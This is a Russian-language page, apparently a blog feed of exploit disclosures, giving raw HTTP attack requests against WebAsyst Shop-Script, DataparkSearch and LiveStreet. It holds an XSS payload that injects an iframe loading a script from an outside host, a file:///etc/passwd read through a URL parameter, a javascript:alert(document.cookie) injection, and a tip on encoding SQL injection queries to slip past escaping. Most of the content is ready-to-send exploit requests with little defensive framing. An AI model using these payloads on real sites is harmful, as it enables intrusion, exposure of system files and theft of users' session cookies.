WebAsyst Shop-Script v.307 XSS

ХSS происходит при передаче в параметр EMAIL — html-кода, где мы можем вызвать iframe с вредоносным скриптом.

WebAsyst Shop-Script

POST /published/forgot.php HTTP/1.1
Content-Length: 210
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=9bae5994ebe0dd6b6fe023506dde2c32; csd=5; cod=3.5.9
Host: SITE.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

C=&edited=1&enter=%d0%9e%d1%82%d0%bf%d1%80%d0%b0%d0%b2%d0%b8%d1%82%d1%8c&userdata%5bDB_KEY%5d=PROSTITUTKI&userdata%5bEMAIL%5d=%22%20><iframe src="http://himic.ru/xss.html"><div%20bad%3d%22&userdata%5bU_ID%5d=01%2f01%2f1967

DataparkSearch Engine, SQL injection, XSS, Cross Site Scripting, File Include

DataparkSearch
DataPark Search Engine

Все SQL-inject запросы надо кодировать в Urlencode ALL, иначе экранируются.

В фаиле storedoc.cgi

Чтение фаилов: /etc/passwd


в GET параметре DU чтение фаила file:///etc/passwd
/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146


/kurgan/cache?DU=file:///etc/passwd
/kurgan/cache?DU=file%3a%2f%2f%2fetc%2fpasswd



Blind SQL Injection

Читать дальше →

Livestreet 0.5.1 и в 0.4, XSS, Cross Site Scripting, раскрытие директории

LiveStreet XSS
Livestreet XSS + раскрытие директории в MooTools_1.2, vlaCal-v2.1

Фаил: decade.php
POST /engine/lib/external/MooTools_1.2/plugs/vlaCal-v2.1/inc/decade.php HTTP/1.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=8223940c401233bbcffe59d6f2b7637d; _metrika_enabled=
Host: blog.himic.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*

ts=%22%20BACKGROUND%3djavascript:alert%28document.cookie%29%20bad%3d%22


Читать дальше →